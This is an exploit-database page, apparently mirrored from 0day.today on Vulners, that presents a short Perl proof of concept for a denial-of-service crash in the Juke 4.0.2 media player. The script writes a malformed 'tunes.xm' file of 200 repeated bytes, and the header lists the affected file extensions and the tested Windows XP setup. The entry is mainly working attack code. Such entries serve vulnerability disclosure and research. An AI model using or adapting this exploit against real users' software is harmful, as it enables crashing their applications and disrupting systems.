Lucene search
K

Juke 4.0.2 DoS Multiple Files

🗓️ 06 Apr 2010 00:00:00Reported by chap0Type 
zdt
 zdt
🔗 0day.today👁 18 Views

Juke 4.0.2 DoS Multiple File

Code
=============================
Juke 4.0.2 DoS Multiple Files 
=============================

# Exploit Title: Juke 4.0.2 DoS Multiple Files
# Date: April 6, 2010
# Software Link: [http://www.wolosoft.com/en/download.html]
# Version: 4.0.2
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90 gmail com
#
# Juke will Crash when you run this script to make
# a file with any of the following extensions
# .xm .nst .s3m .stm .mod
#
# Usage: Run Script -> Add file with + -> Press Play
#!/usr/bin/perl
 
my $music = "tunes.xm";
my $mic = "\x41" x 200;
  
print "Creating File . . .\n";
sleep(1);
 
open (FILE, ">$music");
print FILE "$mic";
close FILE;
 
print "\nIt's a mix between Jazz and Funk, it's called Junk!";



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2010 00:00Current
7High risk
Vulners AI Score7
18